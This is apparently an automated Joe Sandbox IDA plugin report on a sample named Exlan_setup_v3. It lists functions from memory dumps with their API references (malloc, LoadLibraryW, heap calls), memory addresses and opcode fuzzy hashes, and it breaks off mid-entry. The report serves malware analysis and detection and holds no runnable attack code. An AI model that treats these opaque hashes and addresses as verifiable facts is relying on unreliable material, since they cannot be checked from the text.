Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: fc0034482e6e095d2da6e9c2dfd5bed8ad83d65cc76d03827b940a92336787db
Instruction ID: 4c99cc9e2886bbd3f22ca26985aad79547580b50e12d68c52ef96e75a5caf5a5
Opcode Fuzzy Hash: fc0034482e6e095d2da6e9c2dfd5bed8ad83d65cc76d03827b940a92336787db
Instruction Fuzzy Hash: AF01B8B2305105AFC744DFA9C880E9AF7A8FB9C204710426AE909C7700DB32EE60CBD1

Function 6CFD31D0 Relevance: 1.7, APIs: 1, Instructions: 213COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CFD32BC

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 484da03e6023bf4a420cc174819917e71e08c0151ab9ee37f5aab7d973a4d0f5
Instruction ID: c3cd27f86d9dc791dc06be6b0bee578fd54679c81c862d3ec7ad7293958af3a1
Opcode Fuzzy Hash: 484da03e6023bf4a420cc174819917e71e08c0151ab9ee37f5aab7d973a4d0f5
Instruction Fuzzy Hash: 86817071A042059FEB04CF58C580B9EBBF1BF45318F2E81A9D529ABB51DB70F949CB90

Function 6CFB7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6CFD2820: _malloc.LIBCMT ref: 6CFD2871

std::tr1::_Xweak.LIBCPMT ref: 6CFB71D2

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 8160ce8b30e75b8a6589e1837cd66e0a3a8b852451e7abc7d368ca4608c22cdb
Instruction ID: 3bea7b5562fb62ef3b1183e576c87017c2fb55e2e63f1d4268b53417fd32ee3c
Opcode Fuzzy Hash: 8160ce8b30e75b8a6589e1837cd66e0a3a8b852451e7abc7d368ca4608c22cdb
Instruction Fuzzy Hash: 6F31A570A0574A9FDB10CFA5C880BABB7F5FF49208F24861DE815A7B41D331E905CB60

Function 6CFCE0D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CFCE101

Part of subcall function 6D009D66: __FF_MSGBANNER.LIBCMT ref: 6D009D7F
Part of subcall function 6D009D66: __NMSG_WRITE.LIBCMT ref: 6D009D86
Part of subcall function 6D009D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D009BD4,6CFA1290,5A45ABCE), ref: 6D009DAB

Part of subcall function 6D009D2C: RtlFreeHeap.NTDLL(00000000,00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D42
Part of subcall function 6D009D2C: GetLastError.KERNEL32(00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D54

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_malloc
String ID:
API String ID: 4236848034-0
Opcode ID: e06af427931b25a35305258e60e7008c76098dad55662a2827d0fe34088352ff
Instruction ID: 3fe87a6fc17e973ed462b2eae99976c005c27dc2fd414df91021dbe6cec5c107
Opcode Fuzzy Hash: e06af427931b25a35305258e60e7008c76098dad55662a2827d0fe34088352ff
Instruction Fuzzy Hash: 32016277B1510967EB00DAADFC41AAB73ECDB89129F1901A6ED0CC3700E675EA1587E2

Function 01710AA8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000), ref: 01710B20

Memory Dump Source

Source File: 00000000.00000002.1673806507.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_Exlan_setup_v3.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e76d23b5fd69d6004588e675aa8764f790415dd0d9137160e1cf08f78c0cd891
Instruction ID: ba75e95a415ea23073bde53983981aecd94df8ed72b7e19729177d6cea01cd18
Opcode Fuzzy Hash: e76d23b5fd69d6004588e675aa8764f790415dd0d9137160e1cf08f78c0cd891
Instruction Fuzzy Hash: C31123B5C006599BCB14CF9AD945BDEFBF4FB48324F10812AE818B7245C378A944CFA5

Function 01710AB0 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000), ref: 01710B20

Memory Dump Source

Source File: 00000000.00000002.1673806507.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_Exlan_setup_v3.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f969ef5d3d143bf55d0683b96ad7d227739d4bb6a7727c86ef300e42b522650e
Instruction ID: f5bd1c276fb339975ea9a8226aadfe5d3314b0151761f56650cb8e338aa4a371
Opcode Fuzzy Hash: f969ef5d3d143bf55d0683b96ad7d227739d4bb6a7727c86ef300e42b522650e
Instruction Fuzzy Hash: 8F1104B5C006599FCB14CF9AD844B9EFBF4FB48324F10812AE818B7244C774A944CFA5

Function 6D009D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6D00E8DC

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: 64b0733bee3fb5ad470f15bcb8f97e9e7f5e8709024483d295128637437b0b1f
Instruction ID: 276b589e4a7ad3aac2968a7bc056ad3bc65d234d881b6a56a4b37353570147a2
Opcode Fuzzy Hash: 64b0733bee3fb5ad470f15bcb8f97e9e7f5e8709024483d295128637437b0b1f
Instruction Fuzzy Hash: 43D0A73151C208F7FB41EBD8D905F6D7BB4AB81325F914065F108BB280DF714E10876A

Function 0580592C Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

4'^q, xrefs: 058060F9

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1d0b0276d4d7fed0bd14c2e2c90dc6c887a390b95e95d552e7deb8669ad6b418
Instruction ID: c4f9d8cb470932fa92504dc7227f5321c6eef5b1c89eb93c56d205bb0dcf5fbe
Opcode Fuzzy Hash: 1d0b0276d4d7fed0bd14c2e2c90dc6c887a390b95e95d552e7deb8669ad6b418
Instruction Fuzzy Hash: 6B313630D08209CFEF54CBA5D8147AEBBB2FB85315F00906AD911A7291D7781E45CFA1

Function 058036D8 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

8bq, xrefs: 0580374A

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: bf47e4133c29aaed913ccad6118cbdf8a92613edc967af896c5a09d6722a90b1
Instruction ID: f6a581788c3d9bd10910b7a013b7c8096b05cf13b93b499433132606bc518d35
Opcode Fuzzy Hash: bf47e4133c29aaed913ccad6118cbdf8a92613edc967af896c5a09d6722a90b1
Instruction Fuzzy Hash: A211B6B1306244DFD341CB19D919B657BA3FBCA304F1588B6D845C73A2DE399C46CB52

Function 058036F8 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

8bq, xrefs: 0580374A

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: ad4736f8efe42cf4116ef509772fa8ada3e91baacd6d1799b17bc37e49d0e795
Instruction ID: 632a512b060fbf22efe7d133537b4f651fe5598fb7be815d2f0baeb5579b8002
Opcode Fuzzy Hash: ad4736f8efe42cf4116ef509772fa8ada3e91baacd6d1799b17bc37e49d0e795
Instruction Fuzzy Hash: 560180B1302104DFD380CA1AD549B25B7E7FBC9314F549875D90AC7391DE39DC828B52

Function 05801F78 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c610290168d3953d8169f5d114c660e3623543fcc38f89147e5e3a620d8f3883
Instruction ID: e414fae95cc828d4b00b1cf5bd6d8a6760101eac47a6641f3cb9f81735f81c6d
Opcode Fuzzy Hash: c610290168d3953d8169f5d114c660e3623543fcc38f89147e5e3a620d8f3883
Instruction Fuzzy Hash: 9D713C39B006088FCB44DF68D98896AB7F2BF8831471190A5ED07DB3A4DB71EC42CB91

Function 05800000 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187a5ea2783d053accc1b1606b12ad760d4816d7db57b7be884aa8f22ee6a57c
Instruction ID: e3d502f9852e99b910a7b450389ad74c625c53efe3eef61de2b1f77f30d56224
Opcode Fuzzy Hash: 187a5ea2783d053accc1b1606b12ad760d4816d7db57b7be884aa8f22ee6a57c
Instruction Fuzzy Hash: CF51F07050E385AFD7629B689C59BAB3F78AF02304F19809BF544DB1E2CA785844CB62

Function 05801F58 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c098400f003b9e81014c2ef9bb5f8de8e29248f604e28aafd0780c9e352bcd
Instruction ID: 278db9e3a7d4ec04df8810eabb7852bd2b22781cae200509b98636f7f8c343a5
Opcode Fuzzy Hash: 33c098400f003b9e81014c2ef9bb5f8de8e29248f604e28aafd0780c9e352bcd
Instruction Fuzzy Hash: C6615A38A04604DFCB54CF68C988969B7F2BF89324B159099ED07DB3A1D770EC42CB91

Function 05800048 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c62d351b8110040a7aea25b8e30d2910a2239620f48a0978d57d41d85c434ae
Instruction ID: 382d49cea1d66a4d0c1b2e6a03fb44504f974a6724d15424ae882d31b789597e
Opcode Fuzzy Hash: 2c62d351b8110040a7aea25b8e30d2910a2239620f48a0978d57d41d85c434ae
Instruction Fuzzy Hash: C9510370A4A349AFD7619B689C59FEB7F78FF01314F14809AF5049A1D2CBB45C40CB62

Function 06B7FE30 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0755ad046161739fe9a9ead2fc5985087e75f30876e254b33c115db4a364109c
Instruction ID: 418b04d8aea3b51d8056f92d5d449aa665b5b091b39c53161fed0f508c73f342
Opcode Fuzzy Hash: 0755ad046161739fe9a9ead2fc5985087e75f30876e254b33c115db4a364109c
Instruction Fuzzy Hash: 1141AE70B40205DFEB54DF68D854B6ABBFAEF89300F148469E515AB395DF35E801CB90

Function 058037D8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74b2ff7a7a89bcf02bdc93788637cecc6863ef6fe8f01cf1cf54a5a39c62cf2
Instruction ID: b5d47bf0d8af7b032c4c5eec8faa13e42ff25fd02900d5c7d5a43999bde18d53
Opcode Fuzzy Hash: f74b2ff7a7a89bcf02bdc93788637cecc6863ef6fe8f01cf1cf54a5a39c62cf2
Instruction Fuzzy Hash: 36415A34B00208CFDB54CB29D949BA9B7F3FB89304F6484A9D90ADB395DF35AC418B51

Function 058037F8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bae31d94b07d3590c47d0892658e535166c7740a1a459c8fa9947309bfa698c
Instruction ID: 084f8536b8faf65b5c707e5bddb7bf4d65c4acb06f7468d8efd52782148e1967
Opcode Fuzzy Hash: 0bae31d94b07d3590c47d0892658e535166c7740a1a459c8fa9947309bfa698c
Instruction Fuzzy Hash: 6E413A34B00208CFDB54CB29D949BAAB7F3FB89304F6594A9D90ADB394DF359C418B51

Function 05803371 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7371dc3f8380ee9ce5ce3acd072ab542d9ee37fc98c23195ba80e68fa486c41a
Instruction ID: d47279cff85ce1cd7a547ed6145bbbf3b32f1c3cfc15c2a7a0ae0f9e7cf38e7b
Opcode Fuzzy Hash: 7371dc3f8380ee9ce5ce3acd072ab542d9ee37fc98c23195ba80e68fa486c41a
Instruction Fuzzy Hash: 9831A47120A7844FC3438B39AC5476A3FE6EB93210F1A48E7D845CF2E6DE689C498752

Function 058034A0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d8a8d88af6a0808ca2662a4487b28b17437f289fb5887b683c45cab672b62f
Instruction ID: 1a2e282985023009d8c054697568a3a7f7d66a8d1943ed0a29a92563fc486805
Opcode Fuzzy Hash: 16d8a8d88af6a0808ca2662a4487b28b17437f289fb5887b683c45cab672b62f
Instruction Fuzzy Hash: 0231B6317057448FD7D2CB2AE848B6E7BA2FF96210F0584B6D909CF2A1DF389C458B51

Function 058034C0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c82a551822647cc4cffd89a0e62498df18a7c5cf4fa9b5f6f5e189aec3296a6
Instruction ID: 1911fd6c07146576b520cb78b59a47abbab3ec4f0eb2fc9e2ef9606a5d08c095
Opcode Fuzzy Hash: 7c82a551822647cc4cffd89a0e62498df18a7c5cf4fa9b5f6f5e189aec3296a6
Instruction Fuzzy Hash: DB21AC317016048FD791CB2AE848B6EB7A7FBC5224F448479E90ACB394DF349C858B80

Function 0153E124 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb3ff9b1a7b3025ddf7c4655f3e59d442b98c87cf7cf5e831be367cb16fe805
Instruction ID: 2df40f605d788ac30509977ebf525b6a62b60ef974e3078dd1f852eef469d8cf
Opcode Fuzzy Hash: 2cb3ff9b1a7b3025ddf7c4655f3e59d442b98c87cf7cf5e831be367cb16fe805
Instruction Fuzzy Hash: A92122B1504240DFDB01DF18DA81B6ABFE5FBC8314F20C669E9094F246C336D806CAB2

Function 0153D964 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b91ffd82002579d3562e7053aa4f4d75afd86c9a1fc9e60e13ff5118eccb21
Instruction ID: 0b1f2d011a82ebd8e257f1a132ee04003e3cba8c9e0b7209be306415fb8cec39
Opcode Fuzzy Hash: f6b91ffd82002579d3562e7053aa4f4d75afd86c9a1fc9e60e13ff5118eccb21
Instruction Fuzzy Hash: 9F212572504240DFCB01DF98DA80B2ABBB6FBC4314F64C569E8094F246C376D806CBA2

Function 058024F6 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e30416222164e5cbeb0dc4e8999bc4b2c10b819cd7a38f9767dabbd4ec0af1
Instruction ID: cb53eb559b7a5cc59eb0b3ab1d325e66c7977d82b9c1ceadebc1866a45301abc
Opcode Fuzzy Hash: 49e30416222164e5cbeb0dc4e8999bc4b2c10b819cd7a38f9767dabbd4ec0af1
Instruction Fuzzy Hash: 3C217135A002058BCB54DF68D9A4A6EBBB3BF88314F15C915E816DB394DF34EC428B81

Function 0153DA4C Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a0456d305f33636a664293285bc3de98a17f8b8c332fc8f339a748b9399f8a
Instruction ID: 234546bf976926117d9aab74cfda50ee6c9f98d41b728a0f66d58f47b4bafba3
Opcode Fuzzy Hash: 04a0456d305f33636a664293285bc3de98a17f8b8c332fc8f339a748b9399f8a
Instruction Fuzzy Hash: 0E2104B1508244DFDB05DF58DA80B2ABBB5FBC4314F64C669E9094F256C376D406CAA1

Function 0153D44C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9081327c01ca7523ae1210ff58f1169a992c250e33ade3745fe63e74e9345eb0
Instruction ID: c6ac329d61eca495757cd331c76311ce8ce7c10fcd04b63a2d65048b93c5b8c3
Opcode Fuzzy Hash: 9081327c01ca7523ae1210ff58f1169a992c250e33ade3745fe63e74e9345eb0
Instruction Fuzzy Hash: B2210171504204EFDB01DF58D5C4B6ABBB5FBC4318F60C669D8094F256C37AE446C661

Function 058033B8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15faafd9a1a04ef520bceb5e60b63d3f0144058167fbe6f66d8b899d6b75c8bb
Instruction ID: 88731c28e7b7d09f2f1e3d158ecc2e0c4aab62b1d88a2c3f85e62789aa2d9f41
Opcode Fuzzy Hash: 15faafd9a1a04ef520bceb5e60b63d3f0144058167fbe6f66d8b899d6b75c8bb
Instruction Fuzzy Hash: 5521D8312097444FC342D72DEC5476A3BA6FB82210F1A88B7D805CF2D5DE789C498752

Function 05800848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd0026efea75d6466e48176b7bac182a3497c75a0676c1979eb780ac79afac8
Instruction ID: f8ae674fa78f1ad72f178f7f5f8d19b8fd252551ae61ec56fc385bf2b82a4b71
Opcode Fuzzy Hash: bdd0026efea75d6466e48176b7bac182a3497c75a0676c1979eb780ac79afac8
Instruction Fuzzy Hash: 5411023120A3449FD3169B78DC19BAA7FB9AF56710F0840ABF204CB2E2CA784C04C762

Function 058021A4 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065f43ecb4e40e32a4453950b06cf5fec6080a5981cb49c43384e50d6c62de75
Instruction ID: 4fe7c96c0bb5b3258108e74ec717665a19f8eaa8aa63cca30a6c163abcde8cd4
Opcode Fuzzy Hash: 065f43ecb4e40e32a4453950b06cf5fec6080a5981cb49c43384e50d6c62de75
Instruction Fuzzy Hash: 7F110271B042565FC704DBA9DD90BAFFBAABBD9210F18802AD905E7281CF719C0583A1

Function 0153E11F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 941f25390d6fe84918475d2766e48bf0ffb3d4160d8cbd86f9fac727af1e1385
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: 9B118E76504280CFDB16CF18D9C4B5ABFA2FB84314F24C6A9DD094F656C33AD41ACBA2

Function 0153D95F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 43c4ca1bc02c7f168eec3524ed8514bd8ea60fc9ed112789d6d3c52adc63e80b
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: FC117C76508280CFDB16CF54D684B1ABF72FB84214F24C6A9D9094B656C37AD41ACBA2

Function 0153DA47 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e877da37ee721d3949158b92f72f664214390db207b7b07ed608f9dd9253c64
Instruction ID: d518f75060a9ea5e735e29cf0a0c933a606fff796af8a6e7cbdfa47002505537
Opcode Fuzzy Hash: 0e877da37ee721d3949158b92f72f664214390db207b7b07ed608f9dd9253c64
